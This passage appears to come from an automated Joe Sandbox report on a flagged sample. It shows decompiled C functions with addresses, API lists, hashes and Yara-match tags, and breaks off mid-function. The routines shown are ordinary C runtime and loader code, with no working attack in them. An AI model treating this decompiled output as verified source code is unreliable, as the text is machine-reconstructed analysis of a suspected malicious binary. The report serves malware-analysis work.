                    0x004029cc

                    APIs
                    • GetLastError.KERNEL32(?,?,004029B8,004027E8,00401E66), ref: 004029CF
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004029DD
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004029F6
                    • SetLastError.KERNEL32(00000000,004029B8,004027E8,00401E66), ref: 00402A48
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                    • Instruction ID: 078a338927bebc8a57084cdf0b2594a36b0b0cb36656b2d2252d312e3d5e2cf0
                    • Opcode Fuzzy Hash: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                    • Instruction Fuzzy Hash: FA012832308A119EE63566B9AE8D5AB2F44EB45338B20023FF510755E1EFFD4C01699C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00288869 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 81%
                    			E00288869(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x292218);
				E00283D50(__ebx, __edi, __esi);
				_t31 = E00286908(__ebx, __edx, _t35);
				_t15 =  *0x294ba0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00286FB4(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x294aa8; // 0x294680
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x294680;
								if(__eflags != 0) {
									E00286D64(_t33);
								}
							}
						}
						_t21 =  *0x294aa8; // 0x294680
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x294aa8; // 0x294680
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00288904();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E00286018(_t29, _t38);
				}
				return E00283D95(_t33);
			}









                    0x00288869
                    0x00288869
                    0x00288869
                    0x00288869
                    0x0028886b
                    0x00288870
                    0x0028887a
                    0x0028887c
                    0x00288884
                    0x002888a5
                    0x002888ab
                    0x002888af
                    0x002888b2
                    0x002888b5
                    0x002888bb
                    0x002888bd
                    0x002888bf
                    0x002888c8
                    0x002888ca
                    0x002888cc
                    0x002888d2
                    0x002888d5
                    0x002888da
                    0x002888d2
                    0x002888ca
                    0x002888db
                    0x002888e0
                    0x002888e3
                    0x002888e9
                    0x002888ed
                    0x002888ed
                    0x002888f3
                    0x002888fa
                    0x0028888c
                    0x0028888c
                    0x0028888c
                    0x0028888f
                    0x00288891
                    0x00288893
                    0x00288895
                    0x0028889a
                    0x002888a2

                    APIs
                    • __getptd.LIBCMT ref: 00288875
                      • Part of subcall function 00286908: __getptd_noexit.LIBCMT ref: 0028690B
                      • Part of subcall function 00286908: __amsg_exit.LIBCMT ref: 00286918
                    • __amsg_exit.LIBCMT ref: 00288895
                    • __lock.LIBCMT ref: 002888A5
                    • InterlockedDecrement.KERNEL32(?), ref: 002888C2
                    • _free.LIBCMT ref: 002888D5
                    • InterlockedIncrement.KERNEL32(00294680), ref: 002888ED
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 3470314060-0
                    • Opcode ID: 1277535ef06fe0f3cad4d47dfb4f4b24c0652439060b9f18cba5d371534ac753
                    • Instruction ID: 84137c96b7b895cfbe0124852af427265dd5a560597324c05d5ac04aedb2ce7a
                    • Opcode Fuzzy Hash: 1277535ef06fe0f3cad4d47dfb4f4b24c0652439060b9f18cba5d371534ac753
                    • Instruction Fuzzy Hash: D0018439D6272AAFCB20BF54A809B5D7760BF04720FC5001AE800676D1CB346972CFD6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404F84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 25%
                    			E00404F84(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x415010; // 0xb51c3102
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x40d42f, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x40e160(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                    0x00404f99
                    0x00404fa4
                    0x00404faa
                    0x00404fae
                    0x00404fb9
                    0x00404fc1
                    0x00404fcb
                    0x00404fd1
                    0x00404fd5
                    0x00404fdc
                    0x00404fe2
                    0x00404fe2
                    0x00404fd5
                    0x00404fe8
                    0x00404fed
                    0x00404fed
                    0x00404ff6
                    0x00405000

                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B51C3102,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FB9
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00404FCB
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FED
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                    • Instruction ID: f45cf89818bd8daf17f7f5fa5db09656c02fb6dca8b021926776a3611c212177
                    • Opcode Fuzzy Hash: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                    • Instruction Fuzzy Hash: 1101A771914626EBDB119F51DC05FAEBBB8FB44715F00493AE811B22D0DBB89900CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281020 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00281020() {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				char _t16;
				char _t21;

				_t21 = 0x60;
				if(RegOpenKeyW(0x80000005, L"Software\\Fonts",  &_v8) == 0) {
					_v12 = 4;
					if(RegQueryValueExW(_v8, L"LogPixels", 0,  &_v16,  &_v20,  &_v12) == 0 && _v16 == 4) {
						_t16 = _v20;
						if(_t16 != 0) {
							_t21 = _t16;
						}
					}
					RegCloseKey(_v8);
				}
				return _t21;
			}









                    0x00281035
                    0x00281042
                    0x0028105b
                    0x0028106a
                    0x00281072
                    0x00281077
                    0x00281079
                    0x00281079
                    0x00281077
                    0x0028107f
                    0x0028107f
                    0x0028108b

                    APIs
                    • RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 0028103A
                    • RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,00281594,?,?,?,00281594), ref: 00281062
                    • RegCloseKey.ADVAPI32(?,?,00281594), ref: 0028107F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: LogPixels$Software\Fonts
                    • API String ID: 3677997916-4238338266
                    • Opcode ID: ec47200165fe8600c54d34ae0db90ad44790778083e78f9b90c9336b94be9767
                    • Instruction ID: 306c5256eadb9436e8dc5988c617e6a8f06c15c9f70c456ece14354245bdb028
                    • Opcode Fuzzy Hash: ec47200165fe8600c54d34ae0db90ad44790778083e78f9b90c9336b94be9767
                    • Instruction Fuzzy Hash: 3AF01975A1020AABDB10DF949C84FAF73BCAB04741F104599ED05E2180E631AA65CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409AC0 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E00409AC0(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				intOrPtr _t45;
				signed int _t48;
				void* _t51;
				signed int _t55;
				intOrPtr _t64;
				intOrPtr _t69;
				void* _t72;
				intOrPtr _t73;
				intOrPtr _t89;
				void* _t90;
				intOrPtr* _t92;
				void* _t94;
				intOrPtr* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t40 =  *0x415010; // 0xb51c3102
				_v8 = _t40 ^ _t96;
				_t89 = _a20;
				if(_t89 > 0) {
					_t69 = E0040AE45(_a16, _t89);
					_t103 = _t69 - _t89;
					_t4 = _t69 + 1; // 0x1
					_t89 = _t4;
					if(_t103 >= 0) {
						_t89 = _t69;
					}
				}
				_t71 = _a32;
				if(_a32 == 0) {
					_t71 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t45 = E004073AA(_t71, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t89, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t45;
				if(_t45 == 0) {
					L38:
					_pop(_t90);
					_pop(_t94);
					_pop(_t72);
					return E004018D4(_t45, _t72, _v8 ^ _t96, 0x400, _t90, _t94);
				} else {
					_t16 = _t45 + _t45 + 8; // 0x8
					asm("sbb eax, eax");
					_t48 = _t45 + _t45 & _t16;
					if(_t48 == 0) {
						_t95 = 0;
						L36:
						_t73 = 0;
						L37:
						E00407EE5(_t95);
						_t45 = _t73;
						goto L38;
					}
					if(_t48 > 0x400) {
						_t95 = E00407D48(_t48);
						if(_t95 == 0) {
							goto L36;
						}
						 *_t95 = 0xdddd;
						L12:
						if(_t95 == 0) {
							goto L36;
						}
						_t51 = E004073AA(_t71, 1, _a16, _t89, _t95, _v12);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L36;
						}
						_t91 = _v12;
						_t73 = E004085AD(_a8, _a12, _t95, _v12, 0, 0, 0, 0, 0);
						if(_t73 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t30 = _t73 + _t73 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t73 + _t73 & _t30;
							if(_t55 == 0) {
								_t92 = 0;
								L34:
								E00407EE5(_t92);
								goto L36;
							}
							if(_t55 > 0x400) {
								_t92 = E00407D48(_t55);
								if(_t92 == 0) {
									goto L34;
								}
								 *_t92 = 0xdddd;
								L26:
								_t92 = _t92 + 8;
								if(_t92 == 0 || E004085AD(_a8, _a12, _t95, _v12, _t92, _t73, 0, 0, 0) == 0) {
									goto L34;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t73);
									_push(_t92);
									_push(0);
									_push(_a32);
									_t73 = E00407464();
									if(_t73 == 0) {
										goto L34;
									} else {
										E00407EE5(_t92);
										goto L37;
									}
								}
							}
							E004018F0(_t55);
							_t92 = _t100;
							if(_t92 == 0) {
								goto L34;
							}
							 *_t92 = 0xcccc;
							goto L26;
						}
						_t64 = _a28;
						if(_t64 == 0) {
							goto L37;
						}
						if(_t73 > _t64) {
							goto L36;
						}
						_t73 = E004085AD(_a8, _a12, _t95, _t91, _a24, _t64, 0, 0, 0);
						if(_t73 != 0) {
							goto L37;
						}
						goto L36;
					}
					E004018F0(_t48);
					_t95 = _t98;
					if(_t95 == 0) {
						goto L36;
					}
					 *_t95 = 0xcccc;
					goto L12;
				}
			}




























                    0x00409ac5
                    0x00409ac6
                    0x00409ac7
                    0x00409ace
                    0x00409ad4
                    0x00409ad9
                    0x00409adf
                    0x00409ae5
                    0x00409ae8
                    0x00409ae8
                    0x00409aeb
                    0x00409aed
                    0x00409aed
                    0x00409aeb
                    0x00409aef
                    0x00409af4
                    0x00409afb
                    0x00409afe
                    0x00409afe
                    0x00409b1a
                    0x00409b1f
                    0x00409b22
                    0x00409b27
                    0x00409c9d
                    0x00409ca0
                    0x00409ca1
                    0x00409ca2
                    0x00409cae
                    0x00409b2d
                    0x00409b2f
                    0x00409b34
                    0x00409b36
                    0x00409b38
                    0x00409c90
                    0x00409c92
                    0x00409c92
                    0x00409c94
                    0x00409c95
                    0x00409c9b
                    0x00000000
                    0x00409c9b
                    0x00409b43
                    0x00409b62
                    0x00409b67
                    0x00000000
                    0x00000000
                    0x00409b6d
                    0x00409b73
                    0x00409b78
                    0x00000000
                    0x00000000
                    0x00409b89
                    0x00409b8e
                    0x00409b93
                    0x00000000
                    0x00000000
                    0x00409b99
                    0x00409bb0
                    0x00409bb4
                    0x00000000
                    0x00000000
                    0x00409bc2
                    0x00409bff
                    0x00409c04
                    0x00409c06
                    0x00409c08
                    0x00409c85
                    0x00409c87
                    0x00409c88
                    0x00000000
                    0x00409c8d
                    0x00409c0c
                    0x00409c27
                    0x00409c2c
                    0x00000000
                    0x00000000
                    0x00409c2e
                    0x00409c34
                    0x00409c34
                    0x00409c39
                    0x00000000
                    0x00409c55
                    0x00409c57
                    0x00409c58
                    0x00409c5c
                    0x00409c7d
                    0x00409c80
                    0x00409c5e
                    0x00409c5e
                    0x00409c5f
                    0x00409c5f
                    0x00409c60
                    0x00409c61
                    0x00409c62
                    0x00409c63
                    0x00409c6b
                    0x00409c72
                    0x00000000
                    0x00409c74
                    0x00409c75
                    0x00000000
                    0x00409c7a
                    0x00409c72
                    0x00409c39
                    0x00409c0e
                    0x00409c13
                    0x00409c17
                    0x00000000
                    0x00000000
                    0x00409c19
                    0x00000000
                    0x00409c19
                    0x00409bc4
                    0x00409bc9
                    0x00000000
                    0x00000000
                    0x00409bd1
                    0x00000000
                    0x00000000
                    0x00409bed
                    0x00409bf1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00409bf7
                    0x00409b45
                    0x00409b4a
                    0x00409b4e
                    0x00000000
                    0x00000000
                    0x00409b54
                    0x00000000
                    0x00409b54

                    APIs
                    • __alloca_probe_16.LIBCMT ref: 00409B45
                    • __alloca_probe_16.LIBCMT ref: 00409C0E
                    • __freea.LIBCMT ref: 00409C75
                      • Part of subcall function 00407D48: RtlAllocateHeap.NTDLL(00000000,00406E77,?,?,00406E77,00000220,?,00000000,?), ref: 00407D7A
                    • __freea.LIBCMT ref: 00409C88
                    • __freea.LIBCMT ref: 00409C95
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                    • String ID:
                    • API String ID: 1423051803-0
                    • Opcode ID: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                    • Instruction ID: f5d5e5908dbe2b0eece80851408d63fed06286bdfdf7f28fe4aa87bf0313151d
                    • Opcode Fuzzy Hash: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                    • Instruction Fuzzy Hash: C351A172A042066FFB209F65CC85EBB36E9EF84714F15453EFC04B6292E638DC109669
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0028A613 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E0028A613(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x295a6c, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x295f5c - _t7;
								if(__eflags == 0) {
									_t9 = E00283CF8(__eflags);
									 *_t9 = E00283CB6(GetLastError());
									goto L17;
								} else {
									__eflags = E0028A030(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00283CF8(__eflags);
										 *_t12 = E00283CB6(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0028A030(_t6, _t30);
						 *((intOrPtr*)(E00283CF8(__eflags))) = 0xc;
						goto L12;
					} else {
						E00286D64(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0028A4FD(__edx, __edi, __esi, _a8);
				}
			}









                    0x0028a61c
                    0x0028a629
                    0x0028a62a
                    0x0028a62d
                    0x0028a62f
                    0x0028a63e
                    0x0028a671
                    0x0028a671
                    0x0028a674
                    0x00000000
                    0x00000000
                    0x0028a641
                    0x0028a643
                    0x0028a645
                    0x0028a645
                    0x0028a645
                    0x0028a652
                    0x0028a658
                    0x0028a65a
                    0x0028a65c
                    0x0028a6bc
                    0x0028a6bc
                    0x0028a65e
                    0x0028a65e
                    0x0028a664
                    0x0028a6a6
                    0x0028a6ba
                    0x00000000
                    0x0028a666
                    0x0028a66d
                    0x0028a66f
                    0x0028a68e
                    0x0028a6a2
                    0x0028a688
                    0x0028a688
                    0x0028a688
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0028a66f
                    0x0028a664
                    0x00000000
                    0x0028a68a
                    0x0028a677
                    0x0028a682
                    0x00000000
                    0x0028a631
                    0x0028a634
                    0x0028a63a
                    0x0028a63a
                    0x0028a68b
                    0x0028a68d
                    0x0028a61e
                    0x0028a628
                    0x0028a628

                    APIs
                    • _malloc.LIBCMT ref: 0028A621
                      • Part of subcall function 0028A4FD: __FF_MSGBANNER.LIBCMT ref: 0028A516
                      • Part of subcall function 0028A4FD: __NMSG_WRITE.LIBCMT ref: 0028A51D
                      • Part of subcall function 0028A4FD: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00286C96,00000000,00000001,00000000,?,00286F3F,00000018,00292178,0000000C,00286FCF), ref: 0028A542
                    • _free.LIBCMT ref: 0028A634
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: AllocHeap_free_malloc
                    • String ID:
                    • API String ID: 2734353464-0
                    • Opcode ID: a1285f0af0c4e35a3a16c079fb2ede2cdaa62f9048aeef5b8f58784441b5991f
                    • Instruction ID: 8b1c38851e5a957656932905b8294c8beb5e52fbe9aacbabd78ad63360d43619
                    • Opcode Fuzzy Hash: a1285f0af0c4e35a3a16c079fb2ede2cdaa62f9048aeef5b8f58784441b5991f
                    • Instruction Fuzzy Hash: 7611083A537625AADF313F74E809B5D379C9B403A0B298427FC05961D0FE7489708F95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00288FEC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E00288FEC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x292258);
				E00283D50(__ebx, __edi, __esi);
				_t28 = E00286908(__ebx, __edx, _t31);
				_t12 =  *0x294ba0; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E00286FB4(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00288F9D(_t29,  *0x294de8);
					 *(_t30 - 4) = 0xfffffffe;
					E00289059();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00286908(_t20, __edx, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E00286018(_t25, _t34);
				}
				return E00283D95(_t29);
			}








                    0x00288fec
                    0x00288fec
                    0x00288fec
                    0x00288fec
                    0x00288fec
                    0x00288fee
                    0x00288ff3
                    0x00288ffd
                    0x00288fff
                    0x00289007
                    0x0028902b
                    0x0028902d
                    0x00289033
                    0x0028903d
                    0x00289048
                    0x0028904b
                    0x00289052
                    0x00289009
                    0x00289009
                    0x0028900d
                    0x00000000
                    0x0028900f
                    0x00289014
                    0x00289014
                    0x0028900d
                    0x00289017
                    0x00289019
                    0x0028901b
                    0x0028901d
                    0x00289022
                    0x0028902a

                    APIs
                    • __getptd.LIBCMT ref: 00288FF8
                      • Part of subcall function 00286908: __getptd_noexit.LIBCMT ref: 0028690B
                      • Part of subcall function 00286908: __amsg_exit.LIBCMT ref: 00286918
                    • __getptd.LIBCMT ref: 0028900F
                    • __amsg_exit.LIBCMT ref: 0028901D
                    • __lock.LIBCMT ref: 0028902D
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00289041
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: 817099fbc43211af88f122356ecb12a9e4b82689294a8166dd8079b4875a5a39
                    • Instruction ID: 053b38cad9e0da09abf38205a6be91bbc7b74487292a8b85b21c634c357aa49d
                    • Opcode Fuzzy Hash: 817099fbc43211af88f122356ecb12a9e4b82689294a8166dd8079b4875a5a39
                    • Instruction Fuzzy Hash: 06F0B43AE377049BDB21BBB4A90BB2D37D06F01721F554109F510AB2D2CB744AA1AF96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402BE3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402BE3(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00405A18(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                    0x00402bf0
                    0x00402bf8
                    0x00402c2d
                    0x00402bfa
                    0x00402c03
                    0x00000000
                    0x00402c2a
                    0x00402c29
                    0x00402c29

                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx), ref: 00402BF0
                    • GetLastError.KERNEL32(?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx,00000000,?,00402AB7), ref: 00402BFA
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402C22
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID: api-ms-
                    • API String ID: 3177248105-2084034818
                    • Opcode ID: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                    • Instruction ID: e589de4d7b83ec3a89ad76cef1a63b0294eee27024da7e6f7d3f22e711884464
                    • Opcode Fuzzy Hash: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                    • Instruction Fuzzy Hash: 2CE01230644204B6FB111B62EE0AB1E3A54AB10B55F104831F90DB41E1EBF69964899C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409F8D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E00409F8D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				signed char* _v48;
				char _v49;
				long _v56;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				signed char* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				char _v108;
				int _v112;
				intOrPtr _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				int _t183;
				signed char* _t186;
				signed int _t190;
				signed char _t191;
				intOrPtr _t194;
				void* _t196;
				long _t197;
				long _t201;
				signed char* _t207;
				void _t209;
				signed char* _t214;
				void* _t221;
				char _t224;
				char* _t228;
				void* _t237;
				long _t243;
				signed int _t244;
				signed char* _t245;
				void* _t255;
				intOrPtr _t261;
				void* _t262;
				struct _OVERLAPPED* _t263;
				intOrPtr* _t264;
				signed int _t265;
				intOrPtr _t266;
				signed int _t271;
				struct _OVERLAPPED* _t274;
				signed int _t276;
				signed char _t281;
